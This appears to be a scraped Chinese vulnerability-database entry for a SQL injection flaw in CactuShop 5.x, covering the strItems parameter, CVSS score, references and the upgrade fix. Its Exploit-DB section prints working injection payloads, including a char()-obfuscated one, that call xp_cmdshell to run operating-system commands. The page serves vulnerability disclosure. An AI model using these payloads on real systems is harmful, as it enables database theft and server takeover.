发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:02:17

[原文]SQL injection vulnerability in (1) mailorder.asp or (2) payonline.asp in CactuShop 5.x allows remote attackers to execute arbitrary SQL commands via the strItems parameter.

[CNNVD]Cactusoft CactuShop SQL远程注入漏洞(CNNVD-200412-487)


- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040331 CactuSoft CactuShop v5.x shopping cart software multiple security
(UNKNOWN)  BID  10019
(UNKNOWN)  XF  cactushop-multiple-sql-injection(15686)

- 漏洞信息

Cactusoft CactuShop SQL远程注入漏洞
高危 输入验证
2004-12-31 00:00:00 2005-10-20 00:00:00

- 公告与补丁


- 漏洞信息 (23898)

Cactusoft CactuShop 5.0/5.1 SQL Injection Vulnerability (EDBID:23898)
asp webapps
2004-03-31 Verified
0 Nick Gudov
N/A [点击下载]

Reportedly CactuShop is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user-supplied URI input before using it to craft an SQL query.

As a result of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed 		

- 漏洞信息

Cactusoft CactuShop payonline.asp strItems Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

CactuShop contains a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'strItems' parameter in the 'payonline.asp' script is not verified properly and will allow a remote attacker to inject or manipulate SQL queries.

- 时间线

2004-03-31 2004-03-16
2004-03-31 Unknow

- 解决方案

Upgrade to version 5.113 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者